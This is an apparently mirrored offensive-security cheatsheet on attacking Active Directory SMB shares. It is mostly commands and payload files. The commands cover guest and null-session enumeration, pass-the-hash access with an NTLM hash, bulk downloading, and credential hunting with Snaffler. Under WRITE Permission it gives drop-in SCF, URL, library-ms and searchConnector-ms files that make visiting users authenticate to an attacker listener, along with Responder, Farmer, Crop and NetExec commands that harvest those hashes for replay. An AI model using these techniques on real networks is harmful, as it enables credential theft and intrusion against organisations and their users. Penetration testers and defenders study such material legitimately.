daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

internal-shares.md (6320B)


      1 ---
      2 title: "Internal - Shares"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/internal-shares.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/internal-shares.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Internal - Shares
     12 
     13 ## READ Permission
     14 
     15 > Some shares can be accessible without authentication, explore them to find some juicy files
     16 
     17 * [Pennyw0rth/NetExec](https://github.com/Pennyw0rth/NetExec) - The Network Execution Tool
     18 
     19   ```ps1
     20   nxc smb 10.0.0.4 -u guest -p '' -M spider_plus
     21   nxc smb 10.0.0.4 -u guest -p '' --get-file \\info.txt.txt infos.txt.txt  --share OPENSHARE
     22   ```
     23 
     24 * [ShawnDEvans/smbmap](https://github.com/ShawnDEvans/smbmap) - a handy SMB enumeration tool
     25 
     26   ```powershell
     27   smbmap -H 10.10.10.10                # null session
     28   smbmap -H 10.10.10.10 -r PATH        # recursive listing
     29   smbmap -H 10.10.10.10 -u invaliduser # guest smb session
     30   smbmap -H 10.10.10.10 -d "DOMAIN.LOCAL" -u "USERNAME" -p "Password123*"
     31   ```
     32 
     33 * [byt3bl33d3r/pth-smbclient](https://github.com/byt3bl33d3r/pth-toolkit) from path-toolkit
     34 
     35   ```powershell
     36   pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
     37   pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/C$
     38   ls  # list files
     39   cd  # move inside a folder
     40   get # download files
     41   put # replace a file
     42   ```
     43 
     44 * [SecureAuthCorp/smbclient](https://github.com/SecureAuthCorp/impacket) from Impacket
     45 
     46   ```powershell
     47   smbclient -I 10.10.10.100 -L ACTIVE -N -U ""
     48           Sharename       Type      Comment
     49           ---------       ----      -------
     50           ADMIN$          Disk      Remote Admin
     51           C$              Disk      Default share
     52           IPC$            IPC       Remote IPC
     53           NETLOGON        Disk      Logon server share
     54           Replication     Disk      
     55           SYSVOL          Disk      Logon server share
     56           Users           Disk
     57   use Sharename # select a Sharename
     58   cd Folder     # move inside a folder
     59   ls            # list files
     60   ```
     61 
     62 * [smbclient](https://www.samba.org/samba/docs/4.9/man-html/smbclient.1.html) - from Samba, ftp-like client to access SMB/CIFS resources on servers
     63 
     64   ```powershell
     65   smbclient -U username //10.0.0.1/SYSVOL
     66   smbclient //10.0.0.1/Share
     67 
     68   # Download a folder recursively
     69   smb: \> mask ""
     70   smb: \> recurse ON
     71   smb: \> prompt OFF
     72   smb: \> lcd '/path/to/go/'
     73   smb: \> mget *
     74   ```
     75 
     76 * [SnaffCon/Snaffler](https://github.com/SnaffCon/Snaffler) - a tool for pentesters to help find delicious candy
     77 
     78   ```ps1
     79   snaffler.exe -s - snaffler.log
     80 
     81   # Snaffle all the computers in the domain
     82   ./Snaffler.exe -d domain.local -c <DC> -s
     83 
     84   # Snaffle specific computers
     85   ./Snaffler.exe -n computer1,computer2 -s
     86   ​
     87   # Snaffle a specific directory
     88   ./Snaffler.exe -i C:\ -s
     89   ```
     90 
     91 ## WRITE Permission
     92 
     93 Write SCF and URL files on a writeable share to farm for user's hashes and eventually replay them.
     94 
     95 Theses attacks can be automated with [Farmer.exe](https://github.com/mdsecactivebreach/Farmer) and [Crop.exe](https://github.com/mdsecactivebreach/Farmer/tree/main/crop)
     96 
     97 ```ps1
     98 # Farmer to receive auth
     99 farmer.exe <port> [seconds] [output]
    100 farmer.exe 8888 0 c:\windows\temp\test.tmp # undefinitely
    101 farmer.exe 8888 60 # one minute
    102 
    103 # Crop can be used to create various file types that will trigger SMB/WebDAV connections for poisoning file shares during hash collection attacks
    104 crop.exe <output folder> <output filename> <WebDAV server> <LNK value> [options]
    105 Crop.exe \\\\fileserver\\common mdsec.url \\\\workstation@8888\\mdsec.ico
    106 Crop.exe \\\\fileserver\\common mdsec.library-ms \\\\workstation@8888\\mdsec
    107 ```
    108 
    109 ### SCF Files
    110 
    111 Drop the following `@something.scf` file inside a share and start listening with Responder : `responder -wrf --lm -v -I eth0`
    112 
    113 ```powershell
    114 [Shell]
    115 Command=2
    116 IconFile=\\10.10.10.10\Share\test.ico
    117 [Taskbar]
    118 Command=ToggleDesktop
    119 ```
    120 
    121 Using [`netexec`](https://github.com/Pennyw0rth/NetExec/blob/master/cme/modules/slinky.py):
    122 
    123 ```ps1
    124 netexec smb 10.10.10.10 -u username -p password -M scuffy -o NAME=WORK SERVER=IP_RESPONDER #scf
    125 netexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER #lnk
    126 netexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER CLEANUP
    127 ```
    128 
    129 ### URL Files
    130 
    131 This attack also works with `.url` files and `responder -I eth0 -v`.
    132 
    133 ```powershell
    134 [InternetShortcut]
    135 URL=whatever
    136 WorkingDirectory=whatever
    137 IconFile=\\10.10.10.10\%USERNAME%.icon
    138 IconIndex=1
    139 ```
    140 
    141 ### Windows Library Files
    142 
    143 > Windows Library Files (.library-ms)
    144 
    145 ```xml
    146 <?xml version="1.0" encoding="UTF-8"?>
    147 <libraryDescription xmlns="<http://schemas.microsoft.com/windows/2009/library>">
    148   <name>@windows.storage.dll,-34582</name>
    149   <version>6</version>
    150   <isLibraryPinned>true</isLibraryPinned>
    151   <iconReference>imageres.dll,-1003</iconReference>
    152   <templateInfo>
    153     <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
    154   </templateInfo>
    155   <searchConnectorDescriptionList>
    156     <searchConnectorDescription>
    157       <isDefaultSaveLocation>true</isDefaultSaveLocation>
    158       <isSupported>false</isSupported>
    159       <simpleLocation>
    160         <url>\\\\workstation@8888\\folder</url>
    161       </simpleLocation>
    162     </searchConnectorDescription>
    163   </searchConnectorDescriptionList>
    164 </libraryDescription>
    165 ```
    166 
    167 ### Windows Search Connectors Files
    168 
    169 > Windows Search Connectors (.searchConnector-ms)
    170 
    171 ```xml
    172 <?xml version="1.0" encoding="UTF-8"?>
    173 <searchConnectorDescription xmlns="<http://schemas.microsoft.com/windows/2009/searchConnector>">
    174     <iconReference>imageres.dll,-1002</iconReference>
    175     <description>Microsoft Outlook</description>
    176     <isSearchOnlyItem>false</isSearchOnlyItem>
    177     <includeInStartMenuScope>true</includeInStartMenuScope>
    178     <iconReference>\\\\workstation@8888\\folder.ico</iconReference>
    179     <templateInfo>
    180         <folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
    181     </templateInfo>
    182     <simpleLocation>
    183         <url>\\\\workstation@8888\\folder</url>
    184     </simpleLocation>
    185 </searchConnectorDescription>
    186 ```
    187 
    188 ## References
    189 
    190 * [SMB Share – SCF File Attacks - December 13, 2017 - @netbiosX](https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/)